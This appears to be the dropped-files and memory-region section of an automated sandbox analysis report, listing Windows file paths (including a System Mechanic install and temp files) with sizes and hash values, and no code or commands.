    1ce403375b6c755729a40efe6475e262

    SHA1

    4670497de26016da73548318ccbb59a18eea2daf

    SHA256

    1b9b5136cca026531e65ae0e436fbdbe7ea1d81375286cde6a4bbccdec7b14f3

    SHA512

    c1820e00d1d7d379b5b511cc94592d568cf26bdd41d8aa602ccb4e899f99fb1f30db84ceb3aacaca61b7ce3840036d49e4152d9967d53bb10f41dad8ffa1d219

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d23beb1547ca95a47fc19c159ae09dfa

    SHA1

    a367e4a4a4eccdcfbf351b6bee210259fecfc1b1

    SHA256

    de4efc65217d0eefaa8d5a1655b2ab946507530b05c497ae010cc02269be984f

    SHA512

    7cc4f4c1ab5abac1ffe836ba1f201cd5cb7a65679ef6d59b77e50ff6d1d242f81c5b905207253ec4b860e407089cb8204677e801b59473268ef033370f0b2cac

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    48ed86142603691c0c80779ca138d63a

    SHA1

    6562584185980fe570dc86f0d814b93386f877c0

    SHA256

    49800080a063d985f3e26d6a9f31f3751e35708a135d589fc4662e3bef11a919

    SHA512

    993bb7d6e53ba43ab8c93050814d1c779994adb00bdd221459eaa4cb92426f738bed07c7c79f4da7e2ebb255abb28095de4231644cb717be7b1b385a38f229cc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4489c36bf32cddc99442043e7dba41a8

    SHA1

    94446cdb7af2ebf72396acc94b47b87fba88e95a

    SHA256

    ee865a25b88ce30b5ad31bdaa4355d77b896dc1a2f589f2f9bc34603d3163977

    SHA512

    1f4dcf03b3e0732aa8b29637ac87380ee2b6a6b3c51269aa1d663c6503c10ef74d057d5dde6c39f135a5058ce0171814b92b9e445d71f4340ace0030902e7de9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b96586185290ab1a5efc0f9a4084a384

    SHA1

    bc7fa5e8d36b077264004f9e1437aa72354e9209

    SHA256

    608fba98061c27cfdc061ec91bf517a2ee3a3799f7a4cd1ed6caab0fbfa6b8fb

    SHA512

    43a7f4b707c79dd3a1a3b341dbe4758b9932420bebc3f0bff591acd7b2cb0c385acb3c8ba5819936426baf0021d05c657409beef55f010148db864d1ecbbd1fd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e2624374905a9e16a071bb9883c93318

    SHA1

    0e31bebf8493ce5b57a38391d5f4b496226b8025

    SHA256

    a0a405c550342055460b75d09e42aa3f616aae68202ed8d95decf234258cc3ce

    SHA512

    0f066163c6e2ef57ece7474ff820831e3def57b12e6ce9a239efa357d88f8ccf7f363674ad5033f85273ca35ea739c1c3e0f124164948ab0368b13542706e78e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5604faf033399c0699467a1ccf7fa685

    SHA1

    52aff151a08dda81a105373a05ad5b5db3ee2f98

    SHA256

    a232d3bef0e9efd2ccbcc96c388676f3bdd125f80657fc5d4d11577ea95a5b3d

    SHA512

    42b04c79191f299f55aadef2c93e818b42902ce18ab68b0b746627b5ff47d98129d66f537ddd1a7b4a51f865bcb12d0cbf055a71207a7ae06cc0c742ba4c2560

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4f65ff72d4d505f742019e28f89cfc6d

    SHA1

    28056d3202a0d78a0dbfcdea4e82dc99f8cd34ce

    SHA256

    b8956d035f97c3bca2fd600f2a66246ae558e9bcbd968ba0c2499ca11589b9fd

    SHA512

    82b9a6b6308346675355f7b538ef030eb056d06a15e6431ba477d5daf8eeea3465c80a866fe54d6cdfff57d0e475117c59c9b0f7242c0f18d5e5ace3e6df5069

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    34911440c2c0ea07b3f5ebab97f7f538

    SHA1

    d2948a2c83f940a2b5ef85912e76824a41d267e0

    SHA256

    1a02d13172dfa3c163ff445753176ecb514da25ac56d300c39218fd1e44a84da

    SHA512

    2430723d1713c1d1c0429a42122d22fa645885c6865e0255c36768c20dc8cbfaa8167a7fba43aa6c0ca87111edf0837d2e2a629f42bcc35155242accbc289c23

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    de3e014febed7911657fe08aebb6bc90

    SHA1

    68479e30c04001b2c8f546d6f74a6568a48a2727

    SHA256

    2015ff858fd802870e638cc4791281ae787a21b02dc939d69d859a9482fcc241

    SHA512

    ae076dfec0d38e094066cc1e01500611021df7f9af223b06ca04bc11f35c781a4757ffe0e6928e8918dc62590bd1f49f82f08ac63268cb812811fb1cd461246e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f7c53d84249b077232362b56ac235685

    SHA1

    ed34be9325539ac47786f89898b1a85ebb8cf5f9

    SHA256

    04f3f37c4b9bed57e015d24f4ee49c08e312eb405534cd8d0df309745164f265

    SHA512

    5f23dd4cbde2476df8ad0f206bfc579abbccd10917e993e50c046d84d26852f6ae93ab321b6a7b91e0cf592b65df72c618eb55d9a4ac05f090b74e2c9910a99c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    efa9516c440556e13e4e57623a59ad24

    SHA1

    fa2f02a3e33f8fd4306ae384404f660baf8fd793

    SHA256

    aceb79aa1131f98d224141dc4274553ca08434fae33e38dba1785946c55aa801

    SHA512

    9808ff27e4017d02ee0aa6c1dec3b450a50db036d0aa275f93d9cb14afbf5a0d623dd5d0e634924bbb5c65f32871697a4d6548fb51a29ee7021e1aa200401147

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    df57434330c14de281334e93f9e9d5db

    SHA1

    52323bca7ccfb044cd4f2e716a56a581cc75f6f5

    SHA256

    5a93f0e34ab6dd07e99eef63fdb1db3ba84eee541e05c784f56799303ff73dec

    SHA512

    39b3fe3d7799f0940f150d347aaa3bf2e37973269f3da313504934e345677f73a1f8e9b9b7d2e9f3513150790c1a0311932c54383856b77362ba4ee60cee1b12

  • C:\Users\Admin\AppData\Local\Temp\Tar883A.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\gesjftigeres\tholeite\fingerable\Shorewards.Bor171

    Filesize

    343KB

    MD5

    5d9a588764e76e9016d729e2977da1b4

    SHA1

    7e618075aef8d20eb490e9099eafea8d632ed323

    SHA256

    a2509c90e5da3aa0acec6a8f042721d6f80e6b701942e81842294bfe8aa6ffe5

    SHA512

    a04ab8734522771a5320c1f1ab77a3b43bed3bc6314a9af85ed4472ebd1c2acc1b3d67b287d0d9e27df6f1637441c5685f6cb8ff97bbcdd0b5329949f292deb0

  • C:\Users\Admin\AppData\Local\Temp\gesjftigeres\tholeite\fingerable\Strategier\Gabrielle.Sel0

    Filesize

    37KB

    MD5

    573e47b1009cd190121e5cc88563d41c

    SHA1

    152eb9ab8dea6caccd4287f9b525617cc14cb1e9

    SHA256

    f018ab2a229bef73da87351a8448c98dd4749794f6ac0f974672c47e6c5f3dc5

    SHA512

    f5976dd33b138c5a328efb5e841bec483c46283cf56165b5e6bcd7610c5c10b658fd0287ee3d8f6d6e3f6176a053fd21604ed4039f7bb7bc218a899ec6a80f46

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    e9cc749fbc55566eb4c599962a824794

    SHA1

    a0bc6109bde01a681402189848fe8244636f58e4

    SHA256

    40f2cd9a37621009849255e408b4a6d4606d58a00c457584a8c799e82e97392c

    SHA512

    cea129162b17539671e6846db5977915eb4882772b95be03f0af4e1286c086a919297de5cd3c46373ee3e9d735b298755dfaf16aa6b96a56a3c20414ca0cd4d0

  • C:\Users\Admin\Desktop\System Mechanic.lnk

    Filesize

    1KB

    MD5

    5a221a0a2222e5219bbff18f8caeaece

    SHA1

    066f111a84e7245b1c655d4b549a636133b92505

    SHA256

    f22625fb8f01df4910dc57c2575f811857e1d08c5c6eea3e6b6f3d3bb6e8f9f7

    SHA512

    c892324ac463b60e283e3f670df547ad54f84065070e3b9df85a5f672cc3f70768eed5d257e7d872257d07d8dd3ddcc1b570017974b8185384b04048673ff54e

  • C:\Windows\System32\drivers\pgfilter.sys

    Filesize

    76KB

    MD5

    570dd0b08099a433e647b61ebda329b2

    SHA1

    9cc5492b6ada7d23151a8ce4b0ab7f069a619fd4

    SHA256

    119601631ccb44c47472c7085b7d3dec6389bb0937032113e023b41de91abdeb

    SHA512

    60b36fb14baf37f1862d46db1b569e7e59da3dc106b3f650953589f2ac80885867b359723ca6f0618c7549fbaefe62c7b8dbb5e793190418f06d146b24bf6183

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Program Files\iolo technologies\System Mechanic\Incinerator.exe

    Filesize

    4.0MB

    MD5

    bb7365846fadef8de9092fc864e0791a

    SHA1

    1189bd36b249f766a3c215a6580c8b16b6b44d97

    SHA256

    283f7f59997eba437b2ad5c5e14ec83ba198ec0f572250e8487dca8fd2d2bc73

    SHA512

    e7b5d11672bf0be7a3eeafb73f25f361dafde4b0e2670d37bc2919570266e32ad56f846431d50cff8976f1d26619cc55bb5bfdc064d10e32d642a58fcb97bf8e

  • \Program Files\iolo technologies\System Mechanic\ToolKit.dll

    Filesize

    9.7MB

    MD5

    760280933b7359793f6d6882c5d31ae8

    SHA1

    8ea087502c3786028ec1cac03265a9b6bd204a4c

    SHA256

    83d456a6143078f0238aaacfe8c3b519bcfdc549ff965e415eab5478b7d0ea55

    SHA512

    07dd92a4f8fee1550859d54a970faec2df51f1d29040d0da9e990e0fee09abfcc5fae3b4877e7a9064ea24738b057dfc02ff44622cb04d38a3e6ffe4207012dd

  • \Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfapi.dll

    Filesize

    164KB

    MD5

    ad6c6bd1a9f0436942468962f2c63aef

    SHA1

    879ccfe45e59a523980f5a2b73c0f6329ac67981

    SHA256

    9e8199987ac9a9601cd01af5c40ca30852b3c2d4e085fbb20415b44a254ad290

    SHA512

    6bdbdf5ed6753b1098dbaeaa6b666e28fcf263580d84e668946dd17801ef0676cc478170133b9436b3702f9c95cc9bd5ef9c0e56e54df6af5ac608f06e11d2bf

  • \Program Files\iolo technologies\System Mechanic\WWSDK.dll

    Filesize

    93KB

    MD5

    861f72e8a07439f99f2c99469b84ac54

    SHA1

    e8a998865b4b4101b7d14a1ad6ad90c12e50f411

    SHA256

    4394e68fb132bb9f68706e92ceef9f1da338982c0974e1569825cda5c05a8d8e

    SHA512

    6fae6bef86a24727f781aa57de8a9d7aca7bc1049f238ca516bb230ae75e4975f9d4fbb85edd22f5ed901d6ef0dda58e3a3f6f0192d818cae573e7eb5bcd7fd2

  • \Program Files\iolo technologies\System Mechanic\defrag.dll

    Filesize

    340KB

    MD5

    1c7b763115cd2b1962032b1c52099a41

    SHA1

    97043a0538274ef6de0eb047064782f5a9cba4b6

    SHA256

    779048608fdb7542d24b23109df1966ce3fbe640150406fad2ec88b3fea70624

    SHA512

    ec81602d2f0d4cc15f2b18906721abee02fa34a556105b7369cac63eb4e5c2577306d2c4a8c0c3610aa214a0eb37862bfa83648b4ebef93fab82327224fea1ba

  • memory/596-1951-0x000000001BA10000-0x000000001BA1A000-memory.dmp

    Filesize

    40KB

  • memory/596-2114-0x0000000072AE0000-0x000000007352C000-memory.dmp

    Filesize

    10.3MB

  • memory/596-1693-0x00000000010F0000-0x00000000012A8000-memory.dmp

    Filesize

    1.7MB

  • memory/1612-2132-0x0000000001160000-0x0000000001318000-memory.dmp

    Filesize

    1.7MB

  • memory/1612-2135-0x0000000000C50000-0x0000000000C5A000-memory.dmp

    Filesize

    40KB

  • memory/1612-2136-0x0000000072AE0000-0x000000007352C000-memory.dmp

    Filesize

    10.3MB

  • memory/1980-1252-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

  • memory/1980-1497-0x0000000000400000-0x000000000045E000-memory.dmp

    Filesize

    376KB

  • memory/1980-1272-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

  • memory/2192-1156-0x000000006F750000-0x000000007019C000-memory.dmp

    Filesize

    10.3MB

  • memory/2192-1155-0x0000000000820000-0x0000000000C27000-memory.dmp

    Filesize

    4.0MB

  • memory/2264-1243-0x0000000000E60000-0x0000000001298000-memory.dmp

    Filesize

    4.2MB

  • memory/2264-1660-0x000000001DEC0000-0x000000001DF12000-memory.dmp

    Filesize

    328KB

  • memory/2264-1249-0x00000000026A0000-0x0000000002738000-memory.dmp

    Filesize

    608KB

  • memory/2264-1640-0x000000001AD90000-0x000000001ADB2000-memory.dmp

    Filesize

    136KB

  • memory/2264-1247-0x000000001B290000-0x000000001B39E000-memory.dmp

    Filesize

    1.1MB

  • memory/2264-1642-0x000000001AE60000-0x000000001AE92000-memory.dmp

    Filesize

    200KB

  • memory/2264-2138-0x0000000072AE0000-0x000000007352C000-memory.dmp

    Filesize

    10.3MB

  • memory/2264-1245-0x000000001BF30000-0x000000001C5B4000-memory.dmp

    Filesize

    6.5MB

  • memory/2264-1270-0x000000001AD20000-0x000000001AD82000-memory.dmp

    Filesize

    392KB

  • memory/2264-1574-0x0000000000C70000-0x0000000000CA2000-memory.dmp

    Filesize

    200KB

  • memory/2264-1652-0x000000001D6C0000-0x000000001D700000-memory.dmp

    Filesize

    256KB

  • memory/2264-1653-0x000000001B3B0000-0x000000001B3BA000-memory.dmp

    Filesize

    40KB

  • memory/2264-1554-0x000000001D750000-0x000000001D7CA000-memory.dmp

    Filesize

    488KB

  • memory/2264-1311-0x0000000000290000-0x00000000002BA000-memory.dmp

    Filesize

    168KB

  • memory/2264-1658-0x000000001D1E0000-0x000000001D1EE000-memory.dmp

    Filesize

    56KB

  • memory/2264-1251-0x000000001C6F0000-0x000000001CF38000-memory.dmp

    Filesize

    8.3MB

  • memory/2264-1556-0x000000001ABE0000-0x000000001AC04000-memory.dmp

    Filesize

    144KB

  • memory/2264-1291-0x000000001CF40000-0x000000001CFF2000-memory.dmp

    Filesize

    712KB

  • memory/2264-1663-0x000000001D630000-0x000000001D638000-memory.dmp

    Filesize

    32KB

  • memory/2264-1665-0x000000001D700000-0x000000001D70C000-memory.dmp

    Filesize

    48KB

  • memory/2264-2130-0x0000000025300000-0x0000000025AA6000-memory.dmp

    Filesize

    7.6MB

  • memory/2264-1459-0x0000000000280000-0x000000000028A000-memory.dmp

    Filesize

    40KB

  • memory/2264-1667-0x000000001DF20000-0x000000001DF38000-memory.dmp

    Filesize

    96KB

  • memory/2264-2116-0x0000000072AE0000-0x000000007352C000-memory.dmp

    Filesize

    10.3MB

  • memory/2264-1669-0x0000000020C20000-0x0000000020DB8000-memory.dmp

    Filesize

    1.6MB

  • memory/2264-1421-0x000000001D000000-0x000000001D09A000-memory.dmp

    Filesize

    616KB

  • memory/2264-1672-0x000000001E270000-0x000000001E286000-memory.dmp

    Filesize

    88KB

  • memory/2264-2196-0x0000000072AE0000-0x000000007352C000-memory.dmp

    Filesize

    10.3MB

  • memory/2264-1674-0x000000001D7D0000-0x000000001D7DE000-memory.dmp

    Filesize

    56KB

  • memory/2428-35-0x00000000215E0000-0x00000000243AE000-memory.dmp

    Filesize

    45.8MB

  • memory/2428-32-0x000007FEF5373000-0x000007FEF5374000-memory.dmp

    Filesize

    4KB

  • memory/2428-28-0x0000000005A70000-0x0000000005A9A000-memory.dmp

    Filesize

    168KB

  • memory/2428-31-0x000000001F8C0000-0x000000001F922000-memory.dmp

    Filesize

    392KB

  • memory/2428-29-0x000000001ED20000-0x000000001EDD2000-memory.dmp

    Filesize

    712KB

  • memory/2428-27-0x0000000000A30000-0x0000000000A3A000-memory.dmp

    Filesize

    40KB

  • memory/2428-25-0x0000000000A30000-0x0000000000A3A000-memory.dmp

    Filesize

    40KB

  • memory/2428-22-0x000000001EA40000-0x000000001EA4A000-memory.dmp

    Filesize

    40KB

  • memory/2428-21-0x000000001F4C0000-0x000000001F7C0000-memory.dmp

    Filesize

    3.0MB

  • memory/2428-20-0x000000001EA10000-0x000000001EA34000-memory.dmp

    Filesize

    144KB

  • memory/2428-19-0x000000001E070000-0x000000001E084000-memory.dmp

    Filesize

    80KB

  • memory/2428-30-0x000000001DF20000-0x000000001DF9A000-memory.dmp

    Filesize

    488KB

  • memory/2428-18-0x000000001E2B0000-0x000000001E2BC000-memory.dmp

    Filesize

    48KB

  • memory/2428-17-0x0000000000360000-0x0000000000370000-memory.dmp

    Filesize

    64KB

  • memory/2428-16-0x000000001EAE0000-0x000000001EBEE000-memory.dmp

    Filesize

    1.1MB

  • memory/2428-15-0x0000000000BB0000-0x0000000004482000-memory.dmp

    Filesize

    56.8MB

  • memory/2428-33-0x0000000000A30000-0x0000000000A3A000-memory.dmp

    Filesize

    40KB

  • memory/2428-34-0x000000001EA50000-0x000000001EA58000-memory.dmp

    Filesize

    32KB

  • memory/2428-14-0x000007FEF5373000-0x000007FEF5374000-memory.dmp

    Filesize

    4KB

  • memory/2428-1169-0x000000001DD10000-0x000000001DD50000-memory.dmp

    Filesize

    256KB

  • memory/2428-1171-0x000000001DD80000-0x000000001DD8C000-memory.dmp

    Filesize

    48KB

  • memory/2428-1230-0x000000001DDE0000-0x000000001DE02000-memory.dmp

    Filesize

    136KB

  • memory/2428-1645-0x000000001DC60000-0x000000001DC6A000-memory.dmp

    Filesize

    40KB

  • memory/2964-517-0x0000000006710000-0x0000000007B7A000-memory.dmp

    Filesize

    20.4MB